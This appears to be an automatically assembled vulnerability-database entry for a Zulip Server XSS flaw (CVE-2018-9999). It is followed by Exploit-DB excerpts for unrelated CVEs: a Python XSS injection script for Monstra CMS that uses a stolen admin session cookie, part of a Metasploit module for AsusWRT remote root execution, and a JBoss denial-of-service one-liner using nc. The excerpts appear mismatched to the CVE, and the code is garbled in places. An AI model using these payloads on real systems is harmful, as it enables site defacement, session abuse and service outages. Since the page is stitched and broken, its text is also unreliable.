CVE-2018-9999
published 2018-04-18
CVE-2018-9999: In Zulip Server versions before 1.7.2, there was an XSS issue with user uploads and the (default) LOCAL_UPLOADS_DIR storage backend.
Priority P423 · medium · 5.4 (CVSS 3.0)
AV:N / AC:L / PR:L / UI:R / S:C / C:L / I:L / A:N
EPSS: 0.75% (50.2th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zulip | zulip_server | < 1.7.2 | 1.7.2 |
CVSS provenance
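| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 5.4 | MEDIUM | CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N |
| nvd | v2.0 | 3.5 | LOW | AV:N/AC:M/Au:S/C:N/I:P/A:N |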
No detection rules found.
Exploit-DB
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
exploitdb·2018-06-07
CVE-2018-10118 Monstra CMS < 3.0.4 - Cross-Site Scripting (1)
Monstra CMS www.target.com')
```python
url = input('Target : ')
print('[*] Required admin\'s PHPSESSID.')
PHPSESSID = input('PHPSESSID : ')
pagename = input('Pagename : ')
script = input('Script : ')
target = 'http://' + url + '/admin/index.php?id=pages&action=add_page'
cookie = {'PHPSESSID':PHPSESSID}
data = {'csrf':'9c1763649f4e5ce611d29ef5cd10914fa61e91f5',\
'page_title':script,\
'page_name':pagename,\
'page_meta_title':'',\
'page_keywords':'',\
'page_description':'',\
'pages':0,\
'templates':'index',\
'status':'published',\
'access':'public',\
'editor':'',\
'page_tags':'',\
'add_page_and_exit':'Save+and+Exit',\
'page_date':'9999-99-99'}
result = runXSS(target, cookie, data)
print('-' * 69)
if result == 'OK':
    print('[+] LINK : http://' + url + '/' + pagename)
else:
    print('[-] Error')
```
Exploit-DB
AsusWRT LAN - Remote Code Execution (Metasploit)
exploitdb·2018-02-26
CVE-2018-6000 AsusWRT LAN - Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'AsusWRT LAN Unauthenticated Remote Code Execution',
'Description' => %q{
The HTTP server in AsusWRT has a flaw where it allows an unauthenticated client to
perform a POST in certain cases. This can be combined with another vulnerability in
the VPN configuration upload routine that sets NVRAM configuration variables directly
from the POST request to enable a special command mode.
This command mode can then be abused by sending a UDP packet to infosvr, which is running
on port UDP 9999 to directly execute commands as root.
This exploit leverages that to start telnetd in a random
Exploit-DB
JBoss Remoting 6.14.18 - Denial of Service
exploitdb·2018-02-16·CVSS 7.5
CVE-2018-1041 [HIGH] JBoss Remoting 6.14.18 - Denial of Service
---
# Exploit Title: Exploit Denial of Service JBoss Remoting (4447/9999)
# Date: 14-02-2018
# Exploit Author: Frank Spierings
# Vendor Homepage: https://www.redhat.com/en/technologies/jboss-middleware/application-platform/get-started
# Software Link: http://ftp.redhat.com/pub/redhat/jboss/eap/
# Version: JBoss EAP 6.14.18 | Fixed in JBoss EAP 6.14.19
# Tested on: Red Hat Enterprise Linux Server release 7.4 |
# CVE : CVE-2018-1041
This is a very easy Denial of Service exploit. The target only requires 4
null bytes: `\x00\x00\x00\x00`.
The CPU will instantly spike after receiving this payload.
printf "\x00\x00\x00\x00" | nc
`printf "\x00\x00\x00\x00" | nc 127.0.0.1 4447`
No writeups or analysis indexed.
2018-04-18
Published